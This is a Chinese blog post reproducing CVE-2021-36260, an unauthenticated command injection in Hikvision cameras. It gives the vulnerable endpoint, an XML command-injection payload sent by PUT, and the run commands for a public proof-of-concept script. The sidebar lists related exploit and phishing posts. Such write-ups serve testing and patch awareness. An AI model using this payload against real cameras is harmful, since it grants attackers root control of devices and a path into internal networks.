海康摄像头CVE-2021-36260漏洞复现

于 2024-03-03 09:45:00 发布
阅读量1.2k 收藏 19
点赞数 19
文章标签: java android 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61869253/article/details/136400781
版权
海康摄像头CVE-2021-36260漏洞复现
  • 1.漏洞介绍
  • 2.手动测试
  • * 2.1.摄像头版本
    • 2.2.漏洞复现
    •   * 2.2.1.更改URL
      • 2.2.2.抓包修改数据
      • 2.2.3.更换请求路径
      • 2.2.4.后期利用
  • 3.POC测试
  • * 3.1.下载POC
    • 3.2.运行POC
    • 3.3.测试漏洞
    • 3.4.执行命令

1.漏洞介绍

攻击者利用该漏洞可以用无限制的 root shell 来完全控制设备,即使设备的所有者受限于有限的受保护 shell(psh)。除了入侵 IP
摄像头外,还可以访问和攻击内部网络。
该漏洞的利用并不需要用户交互,攻击者只需要访问 http 或 HTTPS
服务器端口(80/443)即可利用该漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。
通告链接:CVE-2021-36260

2.手动测试

2.1.摄像头版本

版本可以具体的去观察一下,通过测试者的描述该漏洞在2016年其实就有了,只是一致没有被披露出来。
参考链接:[参考文章](https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-
Unauthenticated-RCE.html)
在界面中是能够看到有多少年的,比如我所在的客户现场就有很多的2019以及2020的摄像头,当然我这是内网,也没有对外映射,就是平常自己测试。正常来说应该在21年的年中之前的摄像头都可能会存在该问题。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/fc2843d4ba6549d49eb2a322f97f00af.png#pic_center)

2.2.漏洞复现

漏洞点位于:/SDK/webLanguage,利用PUT方法上传xml数据。

命令:<?xml version='1.0' encoding='utf-8'?><language>$(Command > webLib/x)</language>
2.2.1.更改URL

这里首先需要将浏览器的访问链接修改至/SDK/webLanguage,访问的url就是:http://IP地址/SDK/webLanguage,访问完成后会出现这样的页面,在这个页面进行刷新抓包。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/5c2c277016a249c6939044ca3a819a30.png#pic_center)

2.2.2.抓包修改数据

这里我们通过抓包后,把数据包放入重放器中,由于后续的操作还需用到。在重放器中把之前提到的代码粘贴进去,然后发送。这里的抓到的包可能会由于浏览器不同所表示出来的形式也不同,可以进行向后面测试。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/2c02a55c10c74873b35f99737525d433.png#pic_center)

2.2.3.更换请求路径

当发送成功后,就需要更换发送路径了,把路径修改为/x。也就是在重放器中将原来/SDK/webLanguage的位置替换为/x,然后发送就可以看到数据了。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/3590f433290943f48277c9c39c0303c5.png#pic_center)

2.2.4.后期利用

这里的后期利用,我就不演示了,都是linux系统,放一些linux命令进行执行就可以了。由于我是在生产环境就不测试了。

3.POC测试

这里就是使用网上公开的POC进行测试。

3.1.下载POC

链接:POC

3.2.运行POC

首先将脚本下载下来,使用python3运行,这里需要注意的是一定要在python脚本的当前目录下运行。

3.3.测试漏洞

这里的测试漏洞,就是测试是否存在漏洞,适合一些点到为止的人,在安全巡检中使用。

命令:python CVE-2021-36260.py --rhost IP地址 --rport 80 --check

![在这里插入图片描述](https://img-
blog.csdnimg.cn/fd077f1364cc4d1cb2e96d013a7584f1.png#pic_center)

3.4.执行命令

这里只是测试了一下是否能够输出目录文件,并没有向后测试,也是由于我在生产环境中,弄坏了,还要找人修,就没有向后测试,当然测试到这里也就表明了漏洞的存在以及是能够被利用的,我的使命也就完成了。

命令:python CVE-2021-36260.py --rhost IP地址 --rport 80 --cmd "ls -al"

![在这里插入图片描述](https://img-
blog.csdnimg.cn/39a7ef299f1c40d0b8cbfd91b1306c75.png#pic_center)

网络安全工程师(白帽子)企业级学习路线

第一阶段:安全基础(入门)

img

第二阶段:Web渗透(初级网安工程师)

img

第三阶段:进阶部分(中级网络安全工程师)

img

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

学习资源分享

python-qing
关注
  • 19
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
关于 海康威视 摄像头的整理-附件资源
03-05
关于 海康威视 摄像头的整理-附件资源
批量修改海康摄像头的OSD-Batch Configuration(海康批量OSD-叠加文字).rar
06-09
太好了,找了好久才找到的资源,可以批量修改OSD。海康威视的摄像头,测试过了,非常好用,还有模板可以下载,稍微编辑就能批量修改摄像头的OSD(叠加文字)
hikvision_CVE-2017-7921配置文件解密.rar
05-20
该程序可以提取由于授权问题影响的多款Hikvision产品的configfile文件中的管理员账号密码。 具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名configurationFile
ubuntu16.04下运行海康威视网络摄像头sdk(qtdemo)
MKraul的博客
04-27 4179
因为工程原因不得不在Ubuntu系统下链接海康威视相机.查阅了很多资料,对于我这种小白来说都不够用,自己摸索吧,然后给海康威视开发者发各种傻x邮件,不要脸地问问题,总在在qt里把相机画面调出来了,希望接下来可以和各位大神一起交流. 1.首先拿到相机,用网线连上电脑,根据操作手册,先把相机激活,http://192.168.1.64/doc/page/login.asp?_1587994274991...
eduSRC那些事儿-4(未授权漏洞+社会工程学)
最新发布
m0_74360619的博客
02-06 475
邮箱一般选择163或Email完美邮箱(https://www.email.cn/),一是可以自定义邮箱名称,二是两个邮箱发送给其他邮箱服务商不会进行拦截,邮箱名称尽量与学校部门使用的邮箱或学校。2、通过搜索引擎或学校官网查看教师个人简介,获取相关个人信息(如:姓名、邮箱、手机号码等),然后批量发送钓鱼邮箱进行撒网式攻击,获取统一认证密码后进行进一步渗透。2、很多学校的学生会在空间、朋友圈发送一些包含个人敏感信息的图片、文字(如:快递单、车/飞机票、学生证,甚至是身份证),整合信息获取所需。
CVE-2017-7921 海康威视(Hikvision) 摄像头漏洞复现
菜鸟学渗透
05-22 8050
这是一个海康威视摄像头后台管理未授权漏洞,通过构造URL可绕过登录查看监控,检索所有用户和配置文件下载,并获取到监控后台管理账号和密码。
CVE-2021-3560 Linux Polkit 权限提升漏洞
做自己喜欢的事,并将其发挥到极致!
11-10 1367
Polkit是默认安装在很多Linux发行版上的系统服务,它由systemd使用,因此任何使用systemd的Linux发行版也使用Polkit。CVE-2021-3560漏洞存在于系统服务Polkit中,同时因为Polkit被Systemd所调用,因此所有默认安装了systemd的Linux发行版都会使用Polkit。该漏洞的成因是执行dbus-send命令后在认证完成前强制终止引发错误。而Polkit未正确处理错误而导致允许无特权的用户添加一个sudo用户进行权限提升。
漏洞复现】Hikvision摄像头产品代码执行漏洞(CVE-2021-36260)
晚风不及你
01-20 1718
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。
HIKVISION海康威视代码执行漏洞复现(CVE-2021-36260)
红队是青春
01-27 5696
CVE-2021-36260海康威视代码执行漏洞复现
CVE-2017-7921海康威视配置文件解码(configfile解码)
12-11
具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。(ps:工具不会使用可以私信我,直接差评的一律自理)
海康摄像头抓拍图片,摄像头信息从数据库读取
05-12
海康通过读取数据库中摄像头信息,抓拍图片; 数据库中: camera_ip:摄像头ip; port:端口号; user_name:账号; password:密码; path:图片保存地址
海康的DS-7104N-SN升级到萤石云.rar
11-26
可以将海康的DS-7104N-SN升级到萤石云,升级后就不需要端口映射,下载萤石云APP直接扫描机身背面的二维码就可以了,这个升级包以不多见,很久以前我向海康工程师要的。现在共享给大家
海康DS-7604N-E1最新固件
04-27
海康DS-7604N-E1,7608N-E1最新固件,解决部分机器不能使用萤石云问题,下载后文件保存在U盘根目录下,在录像机维护里选择升级即可(请注意,U盘要使用FAT32格式才能被录像机识别哦)
海康威视CVE-2017-7921
热门推荐
qq_46527139的博客
12-22 1万+
海康威视CVE-2017-7921
海康威视摄像头命令注入 CVE-2021-36260
qq_14902381的博客
05-23 1544
海康威视命令注入 CVE-2021-36260
海康威视部分综合安防管理平台产品存在任意文件上传漏洞
Al345__的博客
11-19 1482
海康威视部分综合安防管理平台历史版本由于对上传文件接口校验不足,攻击者可以将恶意文件上传到平台,导致获取服务权限或服务异常。攻击者利用漏洞上传Webshell,并随后执行任意命令,对主机上相关文件进行加密,加密后缀为locked1。海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控、联网报警、智能分析、运维管理等多种安全防范应用系统,构建的多业务应用综合管理平台。(2)建立重要业务数据的定期备份机制,并做好权限隔离,防止勒索软件对备份数据进行加密;
海康摄像头modbus
07-29
海康摄像头海康威视(Hangzhou Hikvision Digital Technology Co., Ltd)生产的一款安防摄像设备。Modbus是一种用于工业自动化领域的通讯协议。那么,海康摄像头是否支持Modbus协议呢? 根据我所了解的信息,海康摄像头一般不直接支持Modbus协议。作为一种工业自动化通讯协议,Modbus主要用于通过串口(RS-232或RS-485)进行设备之间的通信。而海康摄像头通常通过网络进行数据传输,而不是通过串口。 然而,虽然海康摄像头本身不支持Modbus协议,但是可以通过其他方式将其与Modbus设备进行通信。例如,可以使用网关设备或协议转换器将海康摄像头的信息转换为Modbus协议兼容的数据,然后再与Modbus设备进行通信。这样就能实现海康摄像头与Modbus设备之间的数据交互。 总之,海康摄像头本身并不直接支持Modbus协议,但可以通过其他设备进行转换以实现与Modbus设备的通信。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值